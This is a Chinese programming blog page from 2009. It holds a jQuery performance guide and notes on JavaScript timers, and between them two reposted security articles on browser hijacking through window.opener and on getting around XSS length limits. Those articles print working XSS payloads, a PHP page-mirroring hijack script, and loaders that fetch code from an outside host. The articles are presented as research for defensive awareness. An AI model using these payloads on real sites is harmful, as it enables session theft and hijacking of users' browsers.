浏览模式: 标准 | 列表分类:Javascript
Submitted by gouki on 2009, May 20, 5:00 PM
原文来自:https://docs.google.com/View?docid=dft4vhq9_21hjb7j9fz&revision=_latest
1,总是从ID选择器开始继承
在jQuery中最快的选择器是ID选择器,因为它直接来自于JavaScript的getElementById()方法。
例如有一段HTML代码:
XML/HTML代码
- <div id="content">
- <form method="post" action="#">
- <h2>交通信号灯</h2>
- <ul id="traffic_light">
- <li><input type="radio" class="on" name="light" value="red" /> 红色</li>
- <li><input type="radio" class="off" name="light" value="yellow" /> 黄色</li>
- <li><input type="radio" class="off" name="light" value="green" /> 绿色</li>
- </ul>
- <input class="button" id="traffic_button" type="submit" value="Go" />
- </form>
- </div>
如果采用下面的选择器,那么效率是低效的。
var traffic_button = $("#content .button");
因为button已经有ID了,我们可以直接使用ID选择器。如下所示:
var traffic_button = $("#traffic_button");
当然 这只是对于单一的元素来讲。如果你需要选择多个元素,这必然会涉及到 DOM遍历和循环,
为了提高性能,建议从最近的ID开始继承。
如下所示:
var traffic_lights = $("#traffic_light input");
2,在class前使用tag(标签名)
在jQuery中第二快的选择器是tag(标签)选择器( 比如:$("head") )。
跟ID选择器累时,因为它来自原生的getElementsByTagName() 方法。
继续看刚才那段HTML代码:
XML/HTML代码
- <div id="content">
- <form method="post" action="#">
- <h2>交通信号灯</h2>
- <ul id="traffic_light">
- <li><input type="radio" class="on" name="light" value="red" /> 红色</li>
- <li><input type="radio" class="off" name="light" value="yellow" /> 黄色</li>
- <li><input type="radio" class="off" name="light" value="green" /> 绿色</li>
- </ul>
- <input class="button" id="traffic_button" type="submit" value="Go" />
- </form>
- </div>
比如需要选择 红绿 单选框,
那么可以使用一个tag name来限制(修饰)class ,如下所示:
var active_light = $("input.on");
当然也可以结合 就近的ID,如下所示:
var active_light = $("#traffic_light input.on");
在使用tag来修饰class的时候,我们需要注意以下几点:
(1) 不要使用tag来修饰ID,如下所示:
var content = $("div#content");
这样一来,选择器会先遍历所有的div元素,然后匹配#content。
(好像jQuery从1.3.1开始改变了选择器核心后,不存在这个问题了。暂时无法考证。)
(2)不要画蛇添足的使用ID来修饰ID,如下所示:
var traffic_light = $("#content #traffic_light");
注:如果使用属性选择器,也请尽量使用tag来修饰,如下所示:
$('p[row="c3221"]').html();而不是这样:$('[row="c3221"]').html();
3,将jQuery对象缓存起来
把jQuery对象缓存起来 就是要告诉我们 要养成将jQuery对象缓存进变量的习惯。
下面是一个jQuery新手写的一段代码:
JavaScript代码
- $("#traffic_light input.on").bind("click", function(){ ... });
- $("#traffic_light input.on").css("border", "1px dashed yellow");
- $("#traffic_light input.on").css("background-color", "orange");
- $("#traffic_light input.on").fadeIn("slow");
但切记不要这么做。
我们应该先将对象缓存进一个变量然后再操作,如下所示:
JavaScript代码
- var $active_light = $("#traffic_light input.on");
- $active_light.bind("click", function(){ ... });
- $active_light.css("border", "1px dashed yellow");
- $active_light.css("background-color", "orange");
- $active_light.fadeIn("slow");
记住,永远不要让相同的选择器在你的代码里出现多次.
注:(1)为了区分普通的JavaScript对象和jQuery对象,可以在变量首字母前加上 $ 符号。
(2)上面代码可以使用jQuery的链式操作加以改善。如下所示:
JavaScript代码
- var $active_light = $("#traffic_light input.on");
- $active_light.bind("click", function(){ ... })
- .css("border", "1px dashed yellow")
- .css("background-color", "orange")
- .fadeIn("slow");
如果你打算在其他函数中使用jQuery对象,那么你必须把它们缓存到全局环境中。
如下代码所示:
JavaScript代码
-
- window.$my = {
- head : $("head"),
- traffic_light : $("#traffic_light"),
- traffic_button : $("#traffic_button")
- };
- function do_something(){
-
- var script = document.createElement("script");
- $my.head.append(script);
-
- $my.cool_results = $("#some_ul li");
- $my.other_results = $("#some_table td");
-
- $my.other_results.css("border-color", "red");
- $my.traffic_light.css("border-color", "green");
- }
-
-
jQuery性能优化指南(1)到此结束,请查看指南(2)。
Tags: jquery
Javascript | 评论:0
| 阅读:17475
Submitted by gouki on 2009, May 9, 10:44 AM
本文和上一篇 一样,我主要是为了了解攻击方法才记录的。有些东西确实没有注意过。以后要多注意啊。不然,就成为别人攻击的目标了。
原文:http://hi.baidu.com/isbx/blog/item/c9baf31f5b36cd6bf724e421.html
很多断行,已经重新排 版
|=---------------------------------------------------------------------------=|
|=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=------------------------=[ By rayh4c ]=---------------------------=|
|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|
|=---------------------------------------------------------------------------=|
[目录]
1. 前言
2. 同源策略简叙
3. 理解window对象的同源策略
4. 窗口引用功能中的同源策略漏洞
4.1 父窗口引用子窗口的同源策略问题
4.2 子窗口引用父窗口的同源策略问题
5. 利用窗口引用漏洞劫持浏览器
6. 利用XSS漏洞劫持浏览器
6.1 正向跨窗口劫持
6.2 反向跨窗口劫持
6.3 极度危险的跨框架窗口引用劫持
6.4 极度危险的正反向跨窗口递归劫持
6.5 完全控制浏览器
7. 后记
8. 参考
一、前言
最近国内关于XSS漏洞的技术文档都比较少,所以决定写这篇文档,其中的很多细节和朋友们都沟通讨论很久了,其中包括了我对浏览器同源策略和XSS的一些理解。XSS漏洞从Session劫持、钓鱼、XSS WORM等主流攻击方式发展到现在,告诉了大家一个真正的跨站师是不会被条条框框所束缚,跨站师们在不断的创新,跨站师们会展示XSS漏洞的所有可能。
二、同源策略简叙
同源策略是浏览器的安全基础,它是浏览器支持的客户端脚本的重要安全标准,我们可以从“源”上了解这一安全标准,按照W3C的标准这个“源”包括域名、协议和端口,各大浏览器都曾爆出过很多同源策略漏洞,危害程度各有不同,比如从06年开始流行至今的MS06-014网页木马漏洞都已经完全颠覆了同源策略。这次的文档主要说的是DOM的同源策略(参考2)中的一个漏洞,然后从漏洞引申到XSS漏洞如何利用DOM的同源策略特性,最终实现浏览器劫持。
三、理解window对象的同源策略
窗口即指的是浏览器窗口,每个浏览器窗口都可以使用window对象实例来表示,window对象有很多属性和方法,写一个简单的脚本可以历遍出window对象的所有属性和方法:
JavaScript代码
- <script language="javascript">
- for(p in window) document.write(p+"<br>");
- </script>
这些window对象的属性和方法可以改变窗口的外观和窗口网页的内容,当这些属性和方法只在一个窗口中使用并不会凸显出安全问题,但是当多个window对象开始互相引用的时候,这些属性和方法就必须遵循同源策略。
举一个简单的例子,如果在a.com的网页可以调用b.com网页window对象的属性和方法,那么跨站师就可以随便XSS互联网上任何一个网站了,所以为了避免安全问题,同源策略是必须的。我们可以把下面的脚本保存为demo.html到本地打开或者丢到远程服务器上进行测试,这个脚本的效果是调用不同源的子窗口window对象的属性和方法,我们会发现location属性的值类型是空白的,这种情况太特殊了,说明不同源的父窗口引用子窗口window对象的location
属性并没有被拒绝访问。
XML/HTML代码
- <script language="javascript">
- function allPrpos(obj) {
- var props = "<table><tr><td>名称</td><td>值</td>";
- for(var p in obj){
- if(typeof(obj[p])=="function"){
- obj[p]();
- }else{
- try
- {
- props+="<tr><td>"+p + "</td><td>" + obj[ p ] + "</td></tr>";
- }
- catch (ex)
- {
-
- props+= "<tr><td>"+p + "</td><td>" +ex.message+"</td></tr>";
- }
-
- }
- }
-
- document.write(props+"</table>");
- }
-
- function createWin() {
- newWin = window.open ("http://www.google.com");
- setTimeout(function(){allPrpos(newWin)},2000);
- }
-
- </script>
-
- <button onclick='createWin()'>创建一个非同源子窗口测试</button>
四、窗口引用功能中的同源策略漏洞
4.1 父窗口引用子窗口的同源策略问题
去年我在幻影杂志发过的IE6跨域脚本漏洞,这个问题微软已经发布了ms08-058补丁修复,但这个漏洞仍然暴露了父窗口引用子窗口的同源策略问题。根据第二部分的测试,我们知道浏览器并没有阻止父窗口访问非同源子窗口的location属性值,我们可以使用下面的脚本进行测试,会发现父窗口可以控制非同源子窗口location属性值。
XML/HTML代码
- <script language="javascript">
- function createWin() {
- newWin = window.open ("http://www.google.com");
- setTimeout(function(){newWin.location="http://www.80sec.com"},2000);
- }
- </script>
-
- <button onclick='createWin()'>创建一个非同源子窗口测试</button>
4.2 子窗口引用父窗口的同源策略问题
逆向测试一次会发现子窗口引用父窗口也存在同样的问题,这里为了更方便和直观我使用javascript伪协议进行验证。子窗口引用父窗口的window对象属性是window.opener,我们可以随意浏览一个网站点击链接打开N个网页,在这些网页的地址栏注入下面的脚本,你一定会惊奇的发现,不管同源还是非同源的父窗口都转跳到了80SEC网站。
JavaScript代码
- javascript:window.opener.location = "http://www.80sec.com";void(0);
五、利用窗口引用漏洞劫持浏览器
经过上面三个枯燥的测试,我们已经暴露了浏览器一个非常严重的安全问题,非同源的子窗口和父窗口可以互相引用控制window对象的location属性值,并没有严格遵循同源策略,那么用户在浏览器中的所有点击行为都有可能被跨站师变相控制。
我们打开浏览器访问互联网上的各个网站,无时无刻不在点击链接,我们点击链接想要产生的结果是去访问我们想要去的URL地址,用户的正常点击只会产生两个结果,打开新窗口或者当前窗口转跳,试想一下你在SNS网站、电子商务网站、BLOG、论坛里点击一个正常的链接后,打开了一个“无害”的网页,原本浏览的信任网页却已经被悄悄替换了,大家可以联想一下会产生什么可怕的后果。
下面我写了一个劫持浏览器的小Demo,思路是获取REFERER后生成镜像页面,同时加入我们的劫持脚本。比如把这个hjk_ref.php丢到本地服务器上测试,将http://127.0.0.1/hjk_ref.php。
这样的链接发到任意一个网站上,点击链接打开新窗口,当所有的注意力都停滞在新窗口的时候,3秒后一个镜像页面将会悄悄替换链接所在页。按照类似的思路,发挥跨站师的想象力,可以做更多的事情,所有的一切仅仅是因为点击了一个链接。
hjk_ref.php代码
- <?php
- if (array_key_exists("HTTP_REFERER", $_SERVER)) {
- $Url_Mirror = $_SERVER["HTTP_REFERER"];
- }
- if(isset ($_GET['ref'])) {
- echo file_get_contents($_GET['ref']) . '<script>alert(\'I had been hijacking your browser!\')</script>';
- }
- ?>
-
- <script language="javascript">
- setTimeout(function(){window.opener.location=window.location+"?ref=<?echo $Url_Mirror;?>"},3000);
- </script>
注:各大主流浏览器仅opera和internet explorer 8不存在窗口引用漏洞。
六、利用XSS漏洞劫持浏览器
延续第四部分的思路,这部分将进入本文的一个重要环节.跨站师们都知道XSS漏洞分为持久和非持久两种,这两种类型的漏洞无论怎么利用都无法跳出窗口的生命周期,窗口关闭后XSS漏洞的效果也就完全消失,窗口的限制一直束缚着跨站师们的发挥,我这里将和大家一起讨论跨站师的终极技巧:
6.1 正向跨窗口劫持
大家可以先试验下hijack_open.js这个脚本,比如打开http://bbs.dvbbs.net/动网论坛主页,我们在地址栏里复制下面的代码使用伪协议注入hijack_open脚本,然后整个页面的链接就都被劫持住了,点击论坛里的任意一个链接,打开的新窗口都会被注入了一个alert对话框脚本。
hijack_open.js代码
- javascript:for(i=0;i<document.links.length;i++){document.links[i].onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert('I had been hijacking your browser!')"}catch(e){};return false;},3000);return false;}};void(0);
6.2 反向跨窗口劫持
同样我们也可以在动网论坛试验,新打开任意一个版块的窗口,在地址栏里复制下面的代码使用伪协议注入hijack_opener脚本,我们会发现原来的页面被反向注入了一个alert对话框脚本。
hijack_opener.js代码
- javascript:window.opener.location="javascript:alert('I had been hijacking your browser!')";void(0);
6.3 极度危险的跨框架窗口引用劫持
非持久型XSS漏洞是在URL参数中注入脚本,一度被认为很鸡肋,一个非持久型的XSS漏洞可能出现URL参数过于冗长等缺点,下面这个window.parent.opener的跨框架窗口引用技巧就适用于所有的非持久型XSS漏洞,我们可以在一个被攻击者的信任网站上的网页里iframe一个非持久型的XSS,如下:
XML/HTML代码
- <iframe src='http://www.target.com/index.php?vul=xss'width='0' height='0'>
在vul参数中写入下面的hijack_frame_opener脚本,跨站师就可以反向跨框架引用窗口
注入脚本。
hijack_frame_opener.js代码
- <script>
- window.parent.opener.location="javascript:alert('I had been hijacking your browser!')";
- </script>
6.4 极度危险的正反向跨窗口递归劫持
luoluo建议我加上了这一部分,窗口之间的引用关系可能是复杂的,我们可以通过window的opener属性链反向递归查找窗口注入XSS脚本,将互相引用过的同域窗口全部劫持,并通过异常处理规避之间跨域页面的访问异常,代码如下:
JavaScript代码
- javascript:(function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert('I had been hijacking your browser!');void(1);";}catch(e){}}})();void(0);
假设页面打开序列有A域->B域->A域的情况,通过对第二个A域页面的反向递归劫持则可以劫持B域之前的A域页面,从而实现“隔空打击”。
同理,正向跨窗口劫持也可以实现递归劫持所有同域的链接,对每个打开的被劫持的页面执行和第一个页面一样的劫持脚本,但是正向递归没法实现反向递归的那种“隔空打击”。
结合正向和反向的链式递归劫持,最终我们可以劫持所有的同域页面。
6.5 完全控制浏览器
一个跨站脚本漏洞的真正意义在程序员的角度是输入和输出问题,而在跨站师的角度则是能够进入同源策略了,可以摆脱同源策略的束缚做任何想做的事情。跨站师们可以利用XSS漏洞在同源策略允许的范围内再跨页面注入脚本,可以不再为窗口关闭后XSS漏洞的效果消失而烦恼,劫持窗口后的跨站师们可以任意发挥,劫持表单,劫持请求,劫持输入等等,我就不再列举实例。无论是持久型还是非持久型的XSS漏洞都是能够发挥最大的威力的,最后实现跨站师的终极目标 - 完全控制浏览器。
七、后记
文章涉及的安全技术全部都是纯研究性质,请不要将这些技术使用在非法途径上。安全与应用永远是一个矛盾体,通往安全的路永远不止一条。感谢对这篇文档的思路和技术给予过帮助的luoluo、cnqing、linx以及80Sec团队的所有成员。
八、参考
1. http://en.wikipedia.org/wiki/Same_origin_policy
2. http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_DOM_access
3. http://www.w3.org/TR/Window/
4. http://www.80sec.com/release/browser-hijacking.txt
5. http://www.80sec.com/all-browser-security-alert.html
6. http://www.80sec.com/ms08-058-attacks-google.html
Tags: xss, 安全
Javascript | 评论:0
| 阅读:22420
Submitted by gouki on 2009, May 9, 10:34 AM
贴本文的意思并非传播黑客技术,而是根据攻击的方向和内容来提醒自己 ,以后写代码需要注意的事项。
原文:http://hi.baidu.com/isbx/blog/item/bee2d31b7ab4bdddac6e7521.html
==Ph4nt0m Security Team==
Issue 0x03, Phile #0x04 of 0x07
|=---------------------------------------------------------------------------=|
|=-----------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=------------------------=[ By luoluo ]=---------------------------=|
|=----------------------=[ <luoluo#ph4nt0m.org> ]=-------------------------=|
|=----------------------=[ <luoluo#80sec.com> ]=------------------------=|
|=---------------------------------------------------------------------------=|
[目录]
1. 综述
2. 突破方法
2.1 利用HTML上下文中其他可以控制的数据
2.2 利用URL中的数据
2.3 JS上下文的利用
2.4 利用浏览器特性在跨域的页面之间传递数据
2.4.1 document.referrer
2.4.2 剪切板clipboardData
2.4.3 窗口名window.name
2.5 以上的方式结合使用
3. 后记
4. 参考
一、综述
有些XSS漏洞由于字符数量有限制而没法有效的利用,只能弹出一个对话框来YY,本文主要讨论如何突破字符数量的限制进行有效的利用,这里对有效利用的定义是可以不受限制执行任意JS。对于跨站师们来说,研究极端情况下XSS利用的可能性是一种乐趣;对于产品安全人员来说,不受限制的利用的可能是提供给开发人员最有力的证据,要求他们重视并修补这些极端情况下的XSS漏洞。
突破的方法有很多种,但是突破的思想基本都一样,那就是执行可以控制的不受限制的数据。
二、突破方法
2.1 利用HTML上下文中其他可以控制的数据
如果存在XSS漏洞的页面HTML上下文还有其他可以控制的数据,那么可以通过JS获得该数据通过eval或者document.write/innerHTML等方式执行该数据,从而达到突破XSS字符数量限制的目的,下面例子假设div元素的内部数据可以控制,但是该数据已经被HTML编码过:
XML/HTML代码
- <div id="x">可控的安全的数据</div>
- <limited_xss_point>alert(/xss/);</limited_xss_point>
由于XSS点有字符数量限制,所以这里只能弹框,那么我们可以把XSS的Payload通过escape编码后作为安全的数据,输出到可控的安全数据位置,然后在XSS点执行可控的安全数据:
XML/HTML代码
- <div id="x">alert%28document.cookie%29%3B</div>
- <limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
长度:28 + len(id)
由于x内部的数据没有字符数量的限制,那么从而可以达到执行任意JS的目的。
2.2 利用URL中的数据
如果页面里不存在上一节所说的可控HTML上下文数据怎么办?有些数据是我们无条件可控的,第一个想到的就是URL,通过在URL的尾部参数构造要执行的代码,然后在XSS点通过document.URL/location.href等方式获得代码数据执行,这里假设代码从第80个字符开始到最后:
XML/HTML代码
- http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
-
- <limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
长度:30
XML/HTML代码
- <limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
长度:31
上面两个例子对比,前一个例子更短,那么有没有办法更短呢?通过查阅JavaScript手册的String的方法可以发现,切割字符串有一个更短的函数slice,5个字符比substr还要短一个字符:
XML/HTML代码
- <limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
长度:29
XML/HTML代码
- <limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
长度:30
那么还有没有办法更短呢?答案是YES,查阅一下MSND里的location对象的参考你会发现
有个hash成员,获取#之后的数据,那么我们可以把要执行的代码放在#后面,然后通过hash获
得代码执行,由于获得的数据是#开头的,所以只需要slice一个字符就可以拿到代码:
XML/HTML代码
- http://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
-
- <limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
长度:29
这样比上面的例子又少了一个字符。那么还可以更短么?
2.3 JS上下文的利用
为什么我如此痛苦?那是因为JS和DHTML的方法名和属性名太长!瞧瞧这些“糟糕”的名字:
JavaScript代码
- String.fromCharCode
- getElementById
- getElementsByTagName
- document.write
- XMLHTTPRequest
- ...
就连开发人员也不愿意多写一次,于是很多站点的前端开发工程师们封装了各式各样的简化函数,最经典的例子就是:
JavaScript代码
- function $(id) {
- return document.getElementById(id);
- }
这些函数同样可以为我们所用,用来缩短我们的Payload的长度。不过上面这个例子不是最短的,IE和FF都支持直接通过ID来引用一个元素。有些函数可以直接用来加载我们的代码:
XML/HTML代码
- function loads(url) {
- ...
- document.body.appendChild(script);
- }
-
- <limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
长度:len(函数名) + len(url) + 5
当然你的url则是越短越好哦!有些函数则会帮我们去作HTTP请求:
XML/HTML代码
- function get(url) {
- ...
- return x.responseText;
- }
-
- <limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
长度:len(函数名) + len(url) + 11
道哥则提出有些流行的JS的开发框架也封装了大量功能强劲的库可供调用,比如:
JQuery
YUI
...
综上所述,我们可以通过分析JS上下文现有的框架、对象、类、函数来尽可能的缩短我们的代码,进而突破长度限制执行任意代码。
2.4 利用浏览器特性在跨域的页面之间传递数据
虽然有同源策略的限制,浏览器的功能设计上仍然保留了极少数的可以跨域传递数据的方法,我们可以利用这些方法来跨页面传递数据到被XSS的域的页面去执行。
2.4.1 document.referrer
攻击者可以在自己的域上构造页面跳转到被XSS页面,在自己域上的页面的url里带了Payload,被XSS的页面通过referrer获取相关代码执行。
攻击者构造的的页面:
XML/HTML代码
- http://www.a.com/attack.html?...&alert(document.cookie)
-
- <a href="http://www.xssedsite.com/xssed.php">go</a>
被XSS的页面:
XML/HTML代码
- <limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
长度:34
这种方式利用上还有一些问题,如果使用location.href或者<meta http-equiv=refresh>实现的自动跳转,在IE里被攻击页面拿不到referrer,而FF则可以。QZ建议用表单提交的方式比较好,我测试了下,果然通用,FF/IE都可以成功获取referrer:
JavaScript代码
- <script type="text/javascript">
- <!--
- window.onload = function(){
- var f = document.createElement("form");
- f.setAttribute("method", "get");
- f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
- document.body.appendChild(f);
- f.submit();
- };
-
- </script>
2.4.2 剪切板clipboardData
攻击者在自己域的页面上通过clipboardData把Payload写入剪切板,然后在被XSS页面获取并执行该数据。
攻击者构造的页面:
JavaScript代码
- <script>
- clipboardData.setData("text", "alert(document.cookie)");
- </script>
被XSS的页面:
XML/HTML代码
- <limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
长度:36
这种方式只适用于IE系列,并且在IE 7及以上版本的浏览器会有安全提示。
2.4.3 窗口名window.name
这是一个很少被用到的特性,在研究同源策略时就注意过这个属性,它是可以跨域传递数据的,但是这个特性本身并不是漏洞。
如果仔细研究过window.open这个方法,会发现一个不常用的第二个参数,这个则是设置窗口名,用于指定target窗口,如果不存在的话则创建新的子窗口,并设置子窗口的name。当我想打搜window.open时一阵狂喜,喜的是window.name这个属性是window对象的成员,那么只需要name就可以引用该属性,但是测试时却发现window.open方法对于第二个参数进行了严格的检查,只允许数字字母以及下划线的组合,禁止特殊字符进入,那么这种方式就没法写入JS或者VBS。
但是经过测试发现我们可以通过window.name直接设置当前窗口的name则没有特殊字符限制,然后直接跳转到被XSS的页面,通过name属性传递Payload过去执行:
攻击者构造的页面:
JavaScript代码
- <script>
- window.name = "alert(document.cookie)";
- locaton.href = "http://www.xssedsite.com/xssed.php";
- </script>
被XSS的页面:
XML/HTML代码
- <limited_xss_point>eval(name);</limited_xss_point>
长度:11
这个长度可以说是短到极致了,并且这个方法IE/FF都可以很好的支持,是个非常有意思的技巧,这个技巧的发现也是促成本文的直接原因。
window.name的特性还有其他一些有趣的应用方式,这个方面的话题以后可以专门写篇文章来探讨。
2.5 以上的方式结合使用
以上的方式结合使用,一般情况下会使得长度更长,但是也不排除在某些变态的过滤情况中,灵活的组合上面的方法可能会起到奇效。
三、后记
JS非常灵活,所以方法肯定不限于这些,在具体的问题的分析和研究中,可以获得很多的乐趣,并且对JS以及浏览器本身有了更深的认识,如果您有巧妙的技巧或者新奇的构思,欢迎和我交流!
感谢axis*刺*大风*道哥、rayh4c*QZ*茄子为本文提出的宝贵意见!
本文是纯粹的技术探讨,请勿用于非法用途!
四、参考
http://msdn.microsoft.com/en-us/library/aa155073.aspx
Tags: xss, 安全
Javascript | 评论:0
| 阅读:18976
Submitted by gouki on 2009, May 7, 1:15 PM
前两天被setInterval搞了一下,后来查查资料,发现这个介绍的还行,于是复制下来,当成资料备查
In this tutorial we'll look at JavaScript's setTimeout(), clearTimeout(), setInterval() and clearInterval() methods, and show how to use them to set timers and create delayed actions.
» 阅读全文
Tags: setinterval, settimeout
Javascript | 评论:0
| 阅读:17878
Submitted by gouki on 2009, May 6, 12:06 PM
使用这个函数还是有点小郁闷的。网上的资料现在大多被AS的资料所覆盖,一般来说setInterval是传递两个参数,这与setTimeout 一样,第一个是方法,第二个是时间,但由于网上找的大多是AS下的setInterval,这就造成了理解错误,正常情况下AS下的 setInterval的参数也是(方法,时间),但setInterval也可以是(对象,方法,时间),甚至更多的参数用来传递给方法。
那么,JS下面的setInterval怎么使用对象中的方法呢?其实很简单,直接使用连接符就行了:setInterval("对象.方法()" , 时间 ),但参数好象是没有办法传递的,如果实在要传,你就只要自己写同名方法覆盖掉系统的setInterval了。
网上有个例子,但我没有运行成功,所以我也不在这里贴出来,主要还是那个callee,arguments这些东东,网上也有很多例子,类似于PHP的func_get_args,利用这个进行伪重载。
呵呵
Tags: setinterval
Javascript | 评论:0
| 阅读:18079